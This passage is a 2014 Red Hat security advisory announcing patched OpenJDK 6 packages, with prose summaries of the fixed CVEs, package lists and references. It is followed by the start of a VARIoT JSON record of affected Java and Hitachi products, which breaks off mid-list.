iD8DBQFTdfckmqjQ0CJFipgRArKEAKCIiAR2WkLo3Vb0gzzQ5RDz7hQZ3gCcDC6A 5xOtKkhOvonpLXoqBiAcXWQ= =qBk5 -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: java-1.6.0-openjdk security and bug fix update Advisory ID: RHSA-2014:0408-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0408.html Issue date: 2014-04-16 CVE Names: CVE-2014-0429 CVE-2014-0446 CVE-2014-0451 CVE-2014-0452 CVE-2014-0453 CVE-2014-0456 CVE-2014-0457 CVE-2014-0458 CVE-2014-0460 CVE-2014-0461 CVE-2014-1876 CVE-2014-2397 CVE-2014-2398 CVE-2014-2403 CVE-2014-2412 CVE-2014-2414 CVE-2014-2421 CVE-2014-2423 CVE-2014-2427 =====================================================================
- Summary:
Updated java-1.6.0-openjdk packages that fix various security issues and one bug are now available for Red Hat Enterprise Linux 5 and 6.
The Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux (v. 5 server) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
The java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Java Software Development Kit.
An input validation flaw was discovered in the medialib library in the 2D component. A specially crafted image could trigger Java Virtual Machine memory corruption when processed. A remote attacker, or an untrusted Java application or applet, could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. (CVE-2014-0429)
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions. (CVE-2014-0456, CVE-2014-2397, CVE-2014-2421)
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2014-0457, CVE-2014-0461)
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2014-2412, CVE-2014-0451, CVE-2014-0458, CVE-2014-2423, CVE-2014-0452, CVE-2014-2414, CVE-2014-0446, CVE-2014-2427)
Multiple flaws were identified in the Java Naming and Directory Interface (JNDI) DNS client. These flaws could make it easier for a remote attacker to perform DNS spoofing attacks. (CVE-2014-0460)
It was discovered that the JAXP component did not properly prevent access to arbitrary files when a SecurityManager was present. This flaw could cause a Java application using JAXP to leak sensitive information, or affect application availability. (CVE-2014-2403)
It was discovered that the Security component in OpenJDK could leak some timing information when performing PKCS#1 unpadding. This could possibly lead to the disclosure of some information that was meant to be protected by encryption. (CVE-2014-0453)
It was discovered that the fix for CVE-2013-5797 did not properly resolve input sanitization flaws in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting (XSS) attacks. (CVE-2014-2398)
An insecure temporary file use flaw was found in the way the unpack200 utility created log files. A local attacker could possibly use this flaw to perform a symbolic link attack and overwrite arbitrary files with the privileges of the user running unpack200. (CVE-2014-1876)
This update also fixes the following bug:
- The OpenJDK update to IcedTea version 1.13 introduced a regression related to the handling of the jdk_version_info variable. This variable was not properly zeroed out before being passed to the Java Virtual Machine, resulting in a memory leak in the java.lang.ref.Finalizer class. This update fixes this issue, and memory leaks no longer occur. (BZ#1085373)
All users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618) 1085373 - java.lang.ref.Finalizer leak when upgrading from 1.62 to 1.66 1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736) 1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766) 1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841) 1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394) 1087413 - CVE-2014-0456 OpenJDK: System.arraycopy() element race condition (Hotspot, 8029858) 1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854) 1087423 - CVE-2014-2397 OpenJDK: classfile parser invalid BootstrapMethods attribute length (Hotspot, 8034926) 1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794) 1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010) 1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797) 1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152) 1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030) 1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188) 1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801) 1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740) 1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163) 1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731) 1087443 - CVE-2014-2403 OpenJDK: JAXP CharInfo file access restriction (JAXP, 8029282)
- Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.i386.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.i386.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.i386.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2014-0429.html https://www.redhat.com/security/data/cve/CVE-2014-0446.html https://www.redhat.com/security/data/cve/CVE-2014-0451.html https://www.redhat.com/security/data/cve/CVE-2014-0452.html https://www.redhat.com/security/data/cve/CVE-2014-0453.html https://www.redhat.com/security/data/cve/CVE-2014-0456.html https://www.redhat.com/security/data/cve/CVE-2014-0457.html https://www.redhat.com/security/data/cve/CVE-2014-0458.html https://www.redhat.com/security/data/cve/CVE-2014-0460.html https://www.redhat.com/security/data/cve/CVE-2014-0461.html https://www.redhat.com/security/data/cve/CVE-2014-1876.html https://www.redhat.com/security/data/cve/CVE-2014-2397.html https://www.redhat.com/security/data/cve/CVE-2014-2398.html https://www.redhat.com/security/data/cve/CVE-2014-2403.html https://www.redhat.com/security/data/cve/CVE-2014-2412.html https://www.redhat.com/security/data/cve/CVE-2014-2414.html https://www.redhat.com/security/data/cve/CVE-2014-2421.html https://www.redhat.com/security/data/cve/CVE-2014-2423.html https://www.redhat.com/security/data/cve/CVE-2014-2427.html https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFTTm2zXlSAg2UNWIIRAkZ8AJ4tQFSY3KSdfOiDJA5KJWO9IJa1BACeMLJ6 PQHHIgiQ5K7Q4/GEJAHNU94= =9aj6 -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0381", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "cosminexus developer professional", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus client", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus client", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk", "scope": "eq", "trust": 1.3, "vendor": "oracle", "version": "1.8.0" }, { "model": "jre", "scope": "eq", "trust": 1.3, "vendor": "oracle", "version": "1.8.0" }, { "model": "cosminexus application server", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "05-05" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus studio", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "05-05" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus developer", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "05-05" }, { "model": "cosminexus client", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "junos space", "scope": "lt", "trust": 1.0, "vendor": "juniper", "version": "15.1" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.10" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.3.1" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "13.10" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "10.04" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.8.1" }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 65", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 55", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.5.0 61", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.7.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 55", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "-07-00" }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.6.0 71", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 61", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus application server enterprise 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.7" }, { "model": "jre 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { 